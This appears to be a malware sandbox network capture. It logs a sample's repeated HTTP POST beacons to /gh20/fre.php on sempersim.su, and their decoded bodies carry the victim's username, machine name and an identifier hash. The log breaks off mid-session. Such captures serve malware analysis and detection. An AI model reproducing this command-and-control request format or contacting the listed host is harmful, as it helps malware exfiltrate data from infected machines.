                                    Jun 23, 2022 18:10:14.571397066 CEST8.8.8.8192.168.2.30x61f0No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    Jun 23, 2022 18:10:16.375451088 CEST8.8.8.8192.168.2.30x4119No error (0)sempersim.su104.155.55.2A (IP address)IN (0x0001)
                                    • sempersim.su
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.349743104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:26.365309954 CEST1129OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 190
                                    Connection: close
                                    Jun 23, 2022 18:08:26.399478912 CEST1130OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz093954DESKTOP-716T771k08F9C4E9C79A3B52B3F739430PEPbK
                                    Jun 23, 2022 18:08:27.266164064 CEST1130INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:10 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 15
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.349744104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:28.518392086 CEST1131OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 190
                                    Connection: close
                                    Jun 23, 2022 18:08:28.552803993 CEST1131OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz093954DESKTOP-716T771+08F9C4E9C79A3B52B3F739430votmd
                                    Jun 23, 2022 18:08:29.393347025 CEST1132INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:12 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 15
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    10192.168.2.349772104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:53.475796938 CEST1355OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:53.510099888 CEST1356OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:54.444253922 CEST1356INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:37 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    11192.168.2.349773104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:56.128163099 CEST1357OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:56.162686110 CEST1357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:56.994401932 CEST1358INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:40 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    12192.168.2.349775104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:59.805159092 CEST1365OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:59.839162111 CEST1366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:00.835938931 CEST1366INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:44 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    13192.168.2.349776104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:02.062352896 CEST1367OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:02.096342087 CEST1367OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:02.967256069 CEST1367INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:46 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    14192.168.2.349777104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:04.362565994 CEST1368OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:04.397391081 CEST1368OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:05.276468039 CEST1369INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:48 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    15192.168.2.349778104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:06.486196995 CEST1370OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:06.520549059 CEST1370OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:07.428229094 CEST1377INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:50 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    16192.168.2.349780104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:08.917855024 CEST1378OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:08.955996990 CEST1378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:09.874479055 CEST1378INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:53 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    17192.168.2.349781104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:11.023803949 CEST1379OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:11.058202028 CEST1379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:11.937966108 CEST1380INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:55 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    18192.168.2.349783104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:13.286094904 CEST1385OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:13.320576906 CEST1385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:14.166476965 CEST1424INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:57 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    19192.168.2.349787104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:17.520239115 CEST1509OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:17.555152893 CEST1509OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:18.447312117 CEST1551INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:01 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.349745104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:08:30.578499079 CEST1132OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:08:30.613064051 CEST1133OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:08:31.463727951 CEST1133INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:08:14 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    20192.168.2.349795104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:20.096904993 CEST1649OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:20.131086111 CEST1650OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:21.018222094 CEST1832INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:04 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    21192.168.2.349807104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:22.064496040 CEST1889OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:22.098875999 CEST1889OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:22.916759968 CEST2012INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:06 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    22192.168.2.349832104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:27.755281925 CEST2469OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:27.791141033 CEST2494OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:28.697077990 CEST2550INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:12 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    23192.168.2.349838104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:30.995615005 CEST2720OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:31.028866053 CEST2721OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:31.916398048 CEST2797INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:15 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    24192.168.2.349842104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:36.768062115 CEST2811OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:36.802442074 CEST2812OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:37.680341005 CEST2812INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:21 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    25192.168.2.349850104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:41.932837009 CEST8127OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 306A36E8
                                    Content-Length: 163
                                    Connection: close
                                    Jun 23, 2022 18:09:41.967153072 CEST8128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jun 23, 2022 18:09:42.794326067 CEST8128INHTTP/1.0 404 Not Found
                                    date: Thu, 23 Jun 2022 16:09:26 GMT
                                    server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                    x-powered-by: PHP/5.4.16
                                    status: 404 Not Found
                                    content-length: 23
                                    content-type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    26192.168.2.349856104.155.55.280C:\Users\user\Desktop\hfyhigXccT.exe
                                    TimestampkBytes transferredDirectionData
                                    Jun 23, 2022 18:09:47.624965906 CEST8173OUTPOST /gh20/fre.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: sempersim.su
